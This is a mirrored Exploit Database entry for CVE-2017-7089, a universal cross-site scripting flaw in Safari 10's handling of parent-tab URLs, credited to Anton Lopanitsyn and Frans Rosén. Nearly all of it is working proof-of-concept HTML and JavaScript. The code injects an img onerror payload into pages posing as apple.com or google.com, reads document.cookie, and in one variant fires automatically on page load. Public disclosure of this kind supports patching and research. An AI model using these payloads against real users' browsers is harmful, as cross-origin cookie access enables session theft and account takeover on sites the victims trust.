Webkit (Safari) – Universal Cross-site Scripting

• Exploit Database
• 124 阅读

• 作者： Anton Lopanitsyn
  日期： 2017-10-03
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/45866/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  <!-- # CVE-2017-7089   **Impact**: Processing maliciously crafted web content may lead to universal cross site scripting   **Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.   #### Safari 10   ##### Local SOP bypass </code><code>html <script> function Pew(){var doc=open(&apos;parent-tab://apple.com&apos;);doc.document.body.innerHTML=&apos;<img src=q onerror=alert(document.cookie)>&apos;;}</script><button onclick=Pew();>Click me!</button> </code><code> ##### Exploit by Frans Rosén </code><code>html data:text/html,<script>function y(){x=open(&apos;parent-tab://google.com&apos;,&apos;_top&apos;),x.document.body.innerHTML=&apos;<img/src="https://www.exploit-db.com/exploits/45866/"onerror="alert(document.cookie)">&apos;};setTimeout(y,100)</script> </code><code> -->   <body onload=document.getElementById(&apos;pew&apos;).click()> <a id=&apos;pew&apos; href=&apos;data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src="https://www.exploit-db.com/exploits/45866/"onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>&apos;>hello</a> </body>